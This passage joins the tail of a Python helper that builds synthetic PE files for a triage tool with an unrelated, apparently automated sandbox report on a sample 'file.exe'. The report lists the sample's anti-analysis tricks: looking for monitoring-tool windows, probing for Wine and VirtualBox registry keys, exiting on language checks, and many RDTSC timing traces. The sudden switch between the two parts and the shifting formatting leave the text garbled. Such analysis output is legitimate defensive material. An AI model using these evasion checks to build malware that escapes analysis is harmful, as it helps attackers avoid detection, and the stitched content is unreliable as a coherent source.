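        raw_size = -(-len(data) // file_align) * file_align
        if name == entry_section:
            entry_rva = va
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"),
                            len(data), va, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-len(data) // sect_align) * sect_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                   # AddressOfEntryPoint
    struct.pack_into("<II", opt, 32, sect_align, file_align)
    struct.pack_into("<II", opt, 56, va, headers_len)            # SizeOfImage, SizeOfHeaders
    image = bytearray((bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs).ljust(headers_len, b"\0") + body)
    # A correct CheckSum unless the caller plants a wrong one to exercise the mismatch path.
    struct.pack_into("<I", image, 0x40 + 24 + 64, pe_checksum(image) if checksum is None else checksum)
    return bytes(image)
```

triage_pe(open(path, "rb").read()) gives the same dict for a real file. A declared checksum of 0 is also reported as a mismatch; on unsigned binaries that is usually a linker that never set one, so treat the checksum flag as corroborating evidence next to the entry-point and entropy results rather than as decisive on its own.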

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13659
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BF202F second address: BF18FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F3A30BBDF8Dh 0x0000000a nop 0x0000000b add dword ptr [ebp+122D2C14h], eax 0x00000011 push dword ptr [ebp+122D0A61h] 0x00000017 add dword ptr [ebp+122D19EEh], eax 0x0000001d call dword ptr [ebp+122D17F3h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2552h], ebx 0x0000002a xor eax, eax 0x0000002c clc 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 mov dword ptr [ebp+122D2552h], eax 0x00000037 mov dword ptr [ebp+122D2997h], eax 0x0000003d pushad 0x0000003e mov ecx, dword ptr [ebp+122D27C7h] 0x00000044 add ecx, dword ptr [ebp+122D291Fh] 0x0000004a popad 0x0000004b mov esi, 0000003Ch 0x00000050 mov dword ptr [ebp+122D2552h], ecx 0x00000056 ja 00007F3A30BBDF94h 0x0000005c jmp 00007F3A30BBDF8Eh 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 cld 0x00000066 lodsw 0x00000068 jmp 00007F3A30BBDF90h 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 jmp 00007F3A30BBDF93h 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b mov dword ptr [ebp+122D2552h], eax 0x00000081 mov esi, edi 0x00000083 popad 0x00000084 push eax 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F3A30BBDF91h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: BF18FF second address: BF1904 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D59732 second address: D59738 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D77CFD second address: D77D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D77D03 second address: D77D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF8Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D77E76 second address: D77E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D77E8F second address: D77EA2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b js 00007F3A30BBDF86h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D781BD second address: D781C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D78574 second address: D7857E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7857E second address: D78586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D78586 second address: D785C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007F3A30BBDF86h 0x0000000c jmp 00007F3A30BBDF8Ch 0x00000011 popad 0x00000012 jmp 00007F3A30BBDF8Ah 0x00000017 push edx 0x00000018 jmp 00007F3A30BBDF98h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7B5E5 second address: D7B5F8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jns 00007F3A30F498C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7B5F8 second address: D7B5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7B5FD second address: D7B614 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jns 00007F3A30F498C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7B614 second address: D7B619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D7B619 second address: BF18FF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A30F498CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F3A30F498CEh 0x00000012 jmp 00007F3A30F498D2h 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F3A30F498D4h 0x00000021 pop eax 0x00000022 js 00007F3A30F498C6h 0x00000028 call 00007F3A30F498D8h 0x0000002d pop edx 0x0000002e push dword ptr [ebp+122D0A61h] 0x00000034 and dx, 63AAh 0x00000039 call dword ptr [ebp+122D17F3h] 0x0000003f pushad 0x00000040 mov dword ptr [ebp+122D2552h], ebx 0x00000046 xor eax, eax 0x00000048 clc 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d mov dword ptr [ebp+122D2552h], eax 0x00000053 mov dword ptr [ebp+122D2997h], eax 0x00000059 pushad 0x0000005a mov ecx, dword ptr [ebp+122D27C7h] 0x00000060 add ecx, dword ptr [ebp+122D291Fh] 0x00000066 popad 0x00000067 mov esi, 0000003Ch 0x0000006c mov dword ptr [ebp+122D2552h], ecx 0x00000072 ja 00007F3A30F498D4h 0x00000078 jmp 00007F3A30F498CEh 0x0000007d add esi, dword ptr [esp+24h] 0x00000081 cld 0x00000082 lodsw 0x00000084 jmp 00007F3A30F498D0h 0x00000089 add eax, dword ptr [esp+24h] 0x0000008d jmp 00007F3A30F498D3h 0x00000092 mov ebx, dword ptr [esp+24h] 0x00000096 pushad 0x00000097 mov dword ptr [ebp+122D2552h], eax 0x0000009d mov esi, edi 0x0000009f popad 0x000000a0 push eax 0x000000a1 push eax 0x000000a2 push edx 0x000000a3 jmp 00007F3A30F498D1h 0x000000a8 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B6EB second address: D7B701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B701 second address: D7B75E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A30F498C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F3A30F498CEh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jno 00007F3A30F498E0h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 jmp 00007F3A30F498D5h 0x00000027 pop edi 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B75E second address: D7B764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B764 second address: D7B768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B8C7 second address: D7B8E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30BBDF94h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7B8E3 second address: D7B8E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BA09 second address: D7BA0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBA9 second address: D7BBBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A30F498D1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7BBBE second address: D7BC23 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 38D557A1h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F3A30BBDF88h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov ch, BAh 0x0000002f lea ebx, dword ptr [ebp+1245D4F2h] 0x00000035 jmp 00007F3A30BBDF8Bh 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F3A30BBDF98h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BFEB second address: D9BFF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BD37 second address: D6BD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BD3C second address: D6BD41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A344 second address: D9A369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3A30BBDF90h 0x0000000c jmp 00007F3A30BBDF8Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A4BD second address: D9A4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A4C6 second address: D9A4E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF98h 0x00000007 jbe 00007F3A30BBDF92h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A4E8 second address: D9A4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9A917 second address: D9A92A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A30BBDF8Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B003 second address: D9B007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B007 second address: D9B021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A30BBDF8Ah 0x0000000d push edi 0x0000000e jns 00007F3A30BBDF86h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A271 second address: D6A2A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3A30F498DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A2A6 second address: D6A2AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A2AE second address: D6A2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6A2B2 second address: D6A2B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BA39 second address: D9BA58 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3A30F498D9h 0x00000008 jmp 00007F3A30F498CDh 0x0000000d jns 00007F3A30F498C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BA58 second address: D9BA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE71 second address: D9BE95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3A30F498C6h 0x0000000a popad 0x0000000b jmp 00007F3A30F498D6h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE95 second address: D9BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BE9B second address: D9BEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BEA5 second address: D9BEAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1935 second address: DA193B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA193B second address: DA193F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA193F second address: DA1943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1E90 second address: DA1E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1E94 second address: DA1E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1E98 second address: DA1EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1EA2 second address: DA1ED7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F3A30F498CAh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 je 00007F3A30F498D4h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1ED7 second address: DA1EF1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3A30BBDF86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F3A30BBDF8Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1EF1 second address: DA1F0E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F3A30F498C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 push edi 0x00000012 jc 00007F3A30F498C6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1F0E second address: DA1F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5B7 second address: D5E5BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5BD second address: D5E5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F3A30BBDF86h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5CE second address: D5E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5D2 second address: D5E5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5D8 second address: D5E5EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5E5EC second address: D5E5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA853C second address: DA8540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8540 second address: DA8573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30BBDF95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F3A30BBDF98h 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA80D3 second address: DA80F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F3A30F498D7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8262 second address: DA8266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA8266 second address: DA828F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A30F498D5h 0x00000007 jmp 00007F3A30F498CCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA828F second address: DA8295 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA83D2 second address: DA83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F3A30F498D1h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC648 second address: DAC657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A30BBDF8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC657 second address: DAC65D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66CD7 second address: D66CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F3A30BBDF90h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66CF4 second address: D66CFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D66CFC second address: D66D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3A30BBDF86h 0x0000000a js 00007F3A30BBDF86h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACCE8 second address: DACCF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACDCE second address: DACDD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD411 second address: DAD421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A30F498CBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADC10 second address: DADC16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADEEB second address: DADEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DADEEF second address: DADEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEEFF second address: DAEF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F3A30F498C8h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAEE03 second address: DAEE0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3A30BBDF86h 0x0000000a rdtsc
